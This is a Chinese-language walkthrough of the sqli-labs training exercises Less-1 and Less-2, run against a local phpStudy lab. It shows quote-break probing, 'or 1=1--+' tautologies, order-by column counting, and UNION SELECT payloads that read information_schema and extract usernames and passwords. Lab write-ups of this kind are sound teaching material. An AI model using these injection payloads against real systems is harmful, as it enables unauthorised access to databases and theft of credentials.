第一步打開phpStudy,點擊啓動
打開瀏覽器輸入要登錄的題目網址.
less-1
在網址後面輸?id=1看一下效果和在數字1後面加一個符號’比較一下
從上述錯誤當中,我們可以看到提交到 sql 中的 1’在經過 sql 語句構造後形成 ‘1’’ LIMIT 0,1, 多加了一個 ’ 。我們可以嘗試一下後面加嘗試 ‘or 1=1–+
嘗試成功,正常返回數據。
接下來對前面的數據進行排序,利用的是order by 加數字–+
order by 加數字,當數字超過 3 就會報錯。
介紹 union 聯合注入,union 的作用是將兩個 sql 語句進行聯合。Union 可以從 下面的例子中可以看出,強調一點:union 前後的兩個 sql 語句的選擇列數要相同纔可以。U nion all 與 union 的區別是增加了去重的功能。我們這裏根據上述 background 的知識,進行 information_schema 知識的應用。
嘗試一下: http://127.0.0.1/sqllib/Less-1/?id=-1’union select 1,2–+
當 id 的數據在數據庫中不存在時,(此時我們可以 id=-1,兩個 sql 語句進行聯合操作時, 當前一個語句選擇的內容爲空,我們這裏就將後面的語句的內容顯示出來)此處前臺頁面返 回了我們構造的 union 的數據。
爆破數據庫:
後面加?id=1%27union%20select%201,group_concat(schema_name),3%%20from%20information_schema.schemata–+
爆security數據庫的數據表:
後面加:?id=-1%27union%20select%201,group_concat(table_name),3%20f rom%20information_schema.tables%20where%20table_schema=%27security%27–+
爆user表的列:
後面加:?id=-1%27union%20select%201,group_concat(column_name),3%2 0from%20information_schema.columns%20where%20table_name=%27users%27–+
報數據:
後面加:
?id=-1%27union%20select%201,username,password%20from%20 users%20where%20id=2–+
less-2
首先打開第二道題:
後面加?id=1和?id=1’
反應的結果和less-1相同
還是由於單引號引起的拋出異常
仍然使用那兩種方法採取保護措施,註釋掉剩餘的查詢。
成功注入的
or 1=1
or 1=1--+
這道題同樣可以採用union操作進行注入。